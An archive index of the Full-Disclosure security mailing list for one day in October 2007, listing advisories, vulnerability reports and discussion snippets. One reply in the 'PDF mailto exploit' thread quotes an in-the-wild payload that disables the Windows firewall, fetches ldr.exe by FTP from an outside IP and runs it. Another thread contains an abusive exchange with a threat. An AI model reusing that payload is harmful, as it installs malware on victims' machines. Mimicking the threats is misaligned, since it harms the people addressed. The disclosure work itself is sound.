[Full-disclosure] [ GLSA 200710-24 ] OpenOffice.org: Heap-based buffer overflow

2007-10-23 Thread Raphael Marichez
Gentoo Linux Security Advisory GLSA 200710-24 http://security.gentoo.org/

Re: [Full-disclosure] simple dns rebinding protection with dnsmasq

2007-10-23 Thread Guasconi Vincent
On 10/22/07, Collin R. Mulliner <[EMAIL PROTECTED]> wrote: > dnsmasq (http://www.thekelleys.org.uk/dnsmasq/doc.html) a popular DHCP > and DNS forwarder and cache server used on many DSL/Cable routers now > has a simple DNS Rebinding protection mechanism. When executed with the > --stop-dns-rebind o

[Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread Paul Szabo
In case you are interested... messages like the following were spammed to my users tonight. Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia --- > From [EMAIL PROTECTED] Tue Oct 23 18:20:46 2007

[Full-disclosure] How to use the tools rainbowrack 1.2-src

2007-10-23 Thread edison
hello Mr Fabien Kraemer: I have downloaded the rainbowrack 1.2-src. But I don't know how to use the tools to find the password of the oracle user password. Would you tell me how to do it or give me an example. Thank you. ___ Full-Disclosure - We

[Full-disclosure] [PoC] DNS Recursion bandwidth amplification

2007-10-23 Thread Shadow
Hey all. I've created a fully working PoC for DNS Recursion bandwidth amplification attacks. Enjoy. spoofer2.pl Description: Binary data

Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread Nick Boyce
On 10/23/07, Paul Szabo <[EMAIL PROTECTED]> wrote: > In case you are interested... messages like the following were spammed > to my users tonight. Thanks for the heads-up. I figured I'd check out Adobe's workaround : http://www.adobe.com/support/security/bulletins/apsb07-18.html ... and there, i

Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread Gregory Boyce
On Tue, 23 Oct 2007, Nick Boyce wrote: >> # To Disable mailto (recommended) >> Modify tSchemePerms by setting the mailto: value to 3: >> version:1|shell:3|hcp:3|ms-help:3|ms-its:3| >> ms-itss:3|its:3|mk:3|mhtml:3|help:3|disk:3|afp:3|disks:3|telnet:3|ssh:3|acrobat:2|mailto:3|file:2 > > And now I'm

[Full-disclosure] Airscanner Mobile Security Advisory #07101401: Mobile-spy Victim/User Phone/SMS/URL Log Spoofing and Persistent XSS Injection

2007-10-23 Thread Seth Fogie
http://www.airscanner.com/security/07101401_mobilespy.htm *Airscanner Mobile Security Advisory #07101401: Mobile-spy Victim/User Phone/SMS/URL Log Spoofing and Persistent XSS Injection* *Product:* Mobile-spy Product and Website *Platform:* NA *Requirements:* NA * Credits:* Seth Fogie Airscann

[Full-disclosure] [vuln.sg] IBM Lotus Notes Attachment Viewer Buffer Overflow Vulnerabilities

2007-10-23 Thread TAN Chew Keong
[vuln.sg] Vulnerability Research Advisory IBM Lotus Notes Attachment Viewer Buffer Overflow Vulnerabilities by Tan Chew Keong Release Date: 2007-10-23 Summary --- Multiple exploitable buffer overflow vulnerabilities were found within the file attachment viewer in IBM Lotus Notes. The vulnera

[Full-disclosure] IRM Discover More Vulnerabilities in Cisco IOS

2007-10-23 Thread Andy Davis
In the last three months IRM has discovered a total of 13 new security vulnerabilities in Cisco IOS. These vulnerabilities were reported to Cisco and have all been allocated PSIRT reference numbers while the root cause and potential impact of each is investigated. Cisco has taken all the vulnerabil

Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread 3APA3A
Dear Paul Szabo, Messages like this I've got are PDF spam without attempt to exploit something, and are spammed since July. Not sure about this one though. --Tuesday, October 23, 2007, 4:18:52 PM, you wrote to full-disclosure@lists.grok.org.uk: PS> In case you are interested... messages l

Re: [Full-disclosure] IRM Discover More Vulnerabilities in Cisco IOS

2007-10-23 Thread crazy frog crazy frog
good. we all know :) On 10/23/07, Andy Davis <[EMAIL PROTECTED]> wrote: > In the last three months IRM has discovered a total of 13 new security > vulnerabilities in Cisco IOS. These vulnerabilities were reported to > Cisco and have all been allocated PSIRT reference numbers while the root > cause

[Full-disclosure] 3proxy double free vulnerability

2007-10-23 Thread xiaojunli.air
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 3proxy double free vulnerability [Security Advisory] Advisory: [AD_LAB-07006] 3proxy double free vulnerability Class: Design Error DATE:10/22/2007 CVEID:CVE-2007-5622 Vulnerable: 3proxy <=0.5.3i Vendor: http://www.3proxy.ru/ I.Synopsi

Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread biz4rre
yes, it try to open: mailt0:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat" PS. mailt0 == mailto PPS. ***k

[Full-disclosure] [ MDKSA-2007:202 ] - Updated Firefox packages fix multiple vulnerabilities

2007-10-23 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:202 http://www.mandriva.com/security/ ___

Re: [Full-disclosure] Airscanner Mobile Security Advisory #07101401: Mobile-spy Victim/User Phone/SMS/URL Log Spoofing and Persistent XSS Injection

2007-10-23 Thread reepex
On 10/23/07, Seth Fogie <[EMAIL PROTECTED]> wrote: > > * Risk Level:* > High - Spoofed log records / Injected JavaScript can lead to malware > attacks > > Risk level high and javascript do not belong together

Re: [Full-disclosure] IRM Discover More Vulnerabilities in Cisco IOS

2007-10-23 Thread reepex
Bug 1: "The Line Printer Daemon, which provides print server functionality in Cisco IOS is vulnerable to a software flaw whereby the length of the hostname of the router is not checked before being copied into a fixed size memory buffer. . However, the attacker must be able to control the

[Full-disclosure] [SECURITY] [DSA 1372-2] New ktorrent packages fix directory traversal

2007-10-23 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA 1373-2 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp October 23th, 2007

[Full-disclosure] [SECURITY] [DSA 1393-1] New xfce4-terminal packages fix arbitrary command execution

2007-10-23 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA 1393-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp October 23rd, 2007

Re: [Full-disclosure] IRM Discover More Vulnerabilities in Cisco IOS

2007-10-23 Thread full-disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 shut up pdp On Tue, 23 Oct 2007 14:31:52 -0400 reepex <[EMAIL PROTECTED]> wrote: > >Bug 1: >"The Line Printer Daemon, which provides print server >functionality in >Cisco IOS is vulnerable to a software flaw whereby the length of >the >hostname of

Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread Nick Boyce
On 10/23/07, Gregory Boyce <[EMAIL PROTECTED]> wrote: > On Tue, 23 Oct 2007, Nick Boyce wrote: > > >> # To Disable mailto (recommended) > >> Modify tSchemePerms by setting the mailto: value to 3: > >> version:1|shell:3|hcp:3|ms-help:3|ms-its:3| > >> ms-itss:3|its:3|mk:3|mhtml:3|help:3|disk:3|afp:3

[Full-disclosure] 3proxy 0.5.3j released (bugfix)

2007-10-23 Thread 3APA3A
3proxy ( http://3proxy.ru/ ) is multi-platform (Windows, Linux, Unix) multi-protocol proxy server with abilities to manage traffic flows and bandwidths, convert requests between different proxy types, authenticate, authorize, control, limit and account users access and more.

[Full-disclosure] [USN-531-2] dhcp vulnerability

2007-10-23 Thread Kees Cook
=== Ubuntu Security Notice USN-531-2 October 23, 2007 dhcp vulnerability CVE-2007-5365 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10

[Full-disclosure] Miranda IM Multiple Buffer Overflow Vulnerabilities

2007-10-23 Thread Research
Miranda IM Multiple Buffer Overflow Vulnerabilities ***Summary*** Multiple buffer overflow vulnerabilities exist in Miranda IM, a popular open source instant messaging client. ***Scope*** These vulnerabilities have been verified in the following Miranda IM version(s): 0.6.8 0.7.0

[Full-disclosure] [USN-536-1] Thunderbird vulnerabilities

2007-10-23 Thread Kees Cook
=== Ubuntu Security Notice USN-536-1 October 23, 2007 mozilla-thunderbird, thunderbird vulnerabilities CVE-2006-2894, CVE-2007-1095, CVE-2007-2292, CVE-2007-3511, CVE-2007-5334, CVE-2007-5337, CVE-2007-5338, CVE-2007-5339, CVE-2007-

[Full-disclosure] [USN-537-1] gnome-screensaver vulnerability

2007-10-23 Thread Kees Cook
=== Ubuntu Security Notice USN-537-1 October 23, 2007 gnome-screensaver vulnerability CVE-2007-3920 === A security issue affects the following Ubuntu releases: Ubuntu 7.10 T

[Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread worried security
they allow folks on Nanog to talk about "internet infrastructure recovery" and the likes. I appreciate its probably private sector folks admin'ing the list but c'mon, surely the DHS have got to get a better control on what the ISP's are talking about in public, especially on a public mailing list

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread John Kinsella
On Wed, Oct 24, 2007 at 12:20:58AM +0100, worried security wrote: > http://www.merit.edu/mail.archives/nanog/msg04104.html Shit! Al Queda's on NANOG! All these years...what were we thinking??? Now that you've found nanog, why don't you go read the archives about this topic being beaten to death

Re: [Full-disclosure] Distributed SSH username/password brute force attack

2007-10-23 Thread nocfed
On 10/22/07, Anders B Jansson <[EMAIL PROTECTED]> wrote: > [EMAIL PROTECTED] wrote: > > Hi, > > > >> Oct 22 20:36:13 nms sshd[90657]: Failed password for invalid user gopher > >> from 77.46.152.2 port 55120 ssh2 > > > > user/password authentication for SSH? one way of cleaning up your > > logs and

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread worried security
On 10/24/07, John Kinsella <[EMAIL PROTECTED]> wrote: > > Shit! Al Queda's on NANOG! All these years...what were we thinking??? > > Now that you've found nanog, why don't you go read the archives about > this topic being beaten to death. Don't fuck with me you prick or i'll track you down.

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Wed, 24 Oct 2007 01:59:15 +0100 worried security <[EMAIL PROTECTED]> wrote: >Don't fuck with me you prick or i'll track you down. Hah! You could not track your own father if your momma told you who, you lame moron. -BEGIN PGP SIGNATURE-

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread worried security
On 10/24/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > On Wed, 24 Oct 2007 01:59:15 +0100 worried security > <[EMAIL PROTECTED]> wrote: > > >Don't fuck with me you prick or i'll track you down. > > Hah! You could not track your own father if your momma told you > who, you lame moron. No? I

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread scott
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 You and some other people on this list hold themselves in such high esteem. It's just a shame no one else does. So what military experience do you have? Or in law enforcement? For that matter, what experience do you have in anything? Good luck in the job h

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-23 Thread 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Wed, 24 Oct 2007 02:52:38 +0100 worried security <[EMAIL PROTECTED]> wrote: >On 10/24/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: >> >> On Wed, 24 Oct 2007 01:59:15 +0100 worried security >> <[EMAIL PROTECTED]> wrote: >> >> >Don't fuck with m

[Full-disclosure] [SECURITY] [DSA 1394-1] New reprepro packages fix authentication bypass

2007-10-23 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1394-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst October 23rd, 2007

[Full-disclosure] rPSA-2007-0222-1 cpio tar

2007-10-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0222-1 Published: 2007-10-23 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: [EMAIL PROTECTED]:1/2.6-14.1-1 [EMAIL PROTECTED]:1/1.15.1-7.3-1 rPath Issue Tracking System: ht